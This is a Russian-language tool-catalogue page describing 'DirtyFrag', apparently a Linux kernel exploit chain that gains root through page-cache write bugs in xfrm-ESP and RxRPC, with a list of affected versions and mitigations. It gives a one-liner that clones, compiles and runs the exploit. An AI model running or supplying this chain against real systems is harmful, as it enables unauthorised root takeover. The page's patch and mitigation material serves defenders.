Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/minime794/dirtyfrag
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация Бинарных Файлов
GitHubminime794/dirtyfrag

DirtyFrag

Цепочка эксплойтов ядра Linux (CVE-2026-43284 и CVE-2026-43500), позволяющая получить root через уязвимости записи в page cache в xfrm-ESP и RxRPC.

Репозиторий
6 ч 24 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Dirty-Frag

Linux CVE-2026-43284 & CVE-2026-43500

Скопировано у @V4bel :) Спасибо :)

В этом документе описывается класс уязвимостей Dirty Frag, впервые обнаруженный и о котором сообщил Hyunwoo Kim (@v4bel). Данный класс позволяет получить привилегии root на основных дистрибутивах Linux путём объединения уязвимости xfrm-ESP Page-Cache Write (CVE-2026-43284) и уязвимости RxRPC Page-Cache Write (CVE-2026-43500).

Dirty Frag — это случай, расширяющий класс ошибок, к которому относятся Dirty Pipe и Copy Fail. Поскольку это детерминированная логическая ошибка, не зависящая от временного окна, состояние гонки не требуется, ядро не паникует при неудачной эксплуатации, а вероятность успеха очень высока.

Подробную техническую информацию и хронологию см. здесь.

root@kitploit:~
xfrm-ESP Page-Cache Write (CVE-2026-43284) была исправлена в mainline f4c50a4034e6.
RxRPC Page-Cache Write (CVE-2026-43500) была исправлена в mainline aa54b1d27fe0.

Эксплуатация: запускать только в рамках авторизованных работ !!

Однострочник: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Пошагово:

сначала скомпилируйте эксплойт, затем запустите бинарный файл

gcc -O0 -Wall -o exp exp.c -lutil

./exp

!! Очистка

⚠️ Важно: после запуска этого эксплойта кэш страниц оказывается загрязнён. Чтобы очистить загрязнённый кэш страниц и обеспечить стабильность системы, выполните:

echo 3 > /proc/sys/vm/drop_caches

или перезагрузите систему. Затронутые версии

root@kitploit:~
CVE-2026-43284: уязвимость xfrm-ESP Page-Cache Write присутствует начиная с cac2661c53f3 (2017-01-17) вплоть до f4c50a4034e6 (2026-05-05).
CVE-2026-43500: уязвимость RxRPC Page-Cache Write присутствует начиная с 2dc334f1a63a (2023-06-08) вплоть до aa54b1d27fe0 (2026-05-10).

Иными словами, эффективное время жизни уязвимостей составляет около 9 лет.

Dirty Frag был протестирован на следующих версиях дистрибутивов.

root@kitploit:~
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...

Меры противодействия

root@kitploit:~
Используйте следующую команду, чтобы удалить модули, в которых возникают уязвимости, и очистить кэш страниц.

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

root@kitploit:~
Как только каждый дистрибутив выполнит обратный перенос патча, обновитесь соответствующим образом.
Скачать инструмент